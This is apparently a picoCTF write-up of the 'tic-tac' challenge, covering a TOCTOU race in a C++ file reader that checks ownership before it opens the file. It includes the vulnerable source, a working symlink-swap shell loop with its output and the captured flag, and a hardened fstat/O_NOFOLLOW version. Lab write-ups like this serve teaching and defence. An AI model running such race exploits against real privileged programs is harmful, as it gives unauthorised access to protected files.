tic-tac

pico
pwn

August 2, 2025

#include <iostream>
#include <fstream>
#include <string>
#include <unistd.h>
#include <sys/stat.h>

int main(int argc, char *argv[]) {
  if (argc != 2) {
    std::cerr << "Usage: " << argv[0] << " <filename>" << std::endl;
    return 1;
  }

  std::string filename = argv[1];
  std::ifstream file(filename);
  struct stat statbuf;

  // Check the file's status information.
  if (stat(filename.c_str(), &statbuf) == -1) {
    std::cerr << "Error: Could not retrieve file information" << std::endl;
    return 1;
  }

  // Check the file's owner.
  if (statbuf.st_uid != getuid()) {
    std::cerr << "Error: you don't own this file" << std::endl;
    return 1;
  }

  // Read the contents of the file.
  if (file.is_open()) {
    std::string line;
    while (getline(file, line)) {
      std::cout << line << std::endl;
    }
  } else {
    std::cerr << "Error: Could not open file" << std::endl;
    return 1;
  }

  return 0;
}

Vuln

There is a program that only reads the contents of files owned by the user running it. The idea is to create a symbolic link that points to a file the user owns, so it passes the first check. Afterwards the user changes the symbolic link to point to flag.txt, and its contents are displayed. This vulnerability is called a time-of-check to time-of-use (TOCTOU) race condition.
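
A hardened version of the reader, added here as an example and not part of the challenge binary or the original post: it opens the file first, then performs the ownership check with fstat() on that same descriptor and reads from it, so the check and the use refer to one inode and a link swap in between changes nothing. O_NOFOLLOW additionally refuses a symlink as the final path component; the function name and return convention are my own.

```cpp
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <cerrno>
#include <cstring>
#include <iostream>
#include <string>

// Hardened reader (added example, not the challenge's txtreader). The
// ownership check runs against the descriptor that is then read, so a
// symlink swap between check and use has nothing left to win.
// Returns 0 on success or an errno value on failure.
int read_owned_file(const std::string &path, std::string &out) {
  // O_NOFOLLOW rejects a symlink as the final path component (ELOOP), so
  // the file.txt link from the PoC is refused instead of resolved. Symlinks
  // in parent directories are still followed; pin the directory if needed.
  int fd = open(path.c_str(), O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
  if (fd < 0) return errno;

  struct stat st;
  if (fstat(fd, &st) != 0) {     // fstat() the open fd, never stat() the name
    int err = errno; close(fd); return err;
  }
  if (!S_ISREG(st.st_mode)) { close(fd); return EINVAL; }
  if (st.st_uid != getuid()) { close(fd); return EPERM; }  // same rule as txtreader

  out.clear();
  char buf[4096];
  ssize_t n;
  while ((n = read(fd, buf, sizeof buf)) > 0) out.append(buf, static_cast<size_t>(n));
  int err = (n < 0) ? errno : 0;
  close(fd);
  return err;
}

int main(int argc, char *argv[]) {
  if (argc != 2) {
    std::cerr << "Usage: " << argv[0] << " <filename>" << std::endl;
    return 1;
  }
  std::string contents;
  int err = read_owned_file(argv[1], contents);
  if (err != 0) {
    std::cerr << "Error: " << std::strerror(err) << std::endl;
    return 1;
  }
  std::cout << contents;
  return 0;
}
```

Running the link.sh loop from the PoC against this version never yields the flag: the link is rejected with ELOOP, and even a plain file path is checked on the descriptor that is read.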

PoC

ctf-player@pico-chall$ touch random.txt
ctf-player@pico-chall$ cat link.sh
while true
do
ln -sf random.txt file.txt
ln -sf flag.txt file.txt
done
ctf-player@pico-chall$ nano execute.sh
ctf-player@pico-chall$ cat execute.sh
while true
do
./txtreader file.txt
done
ctf-player@pico-chall$ chmod +x execute.sh link.sh
ctf-player@pico-chall$ ./link.sh &
[1] 45
ctf-player@pico-chall$ ./execute.sh &
[2] 2889
ctf-player@pico-chall$ Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
picoCTF{******_3a5y_5748402c}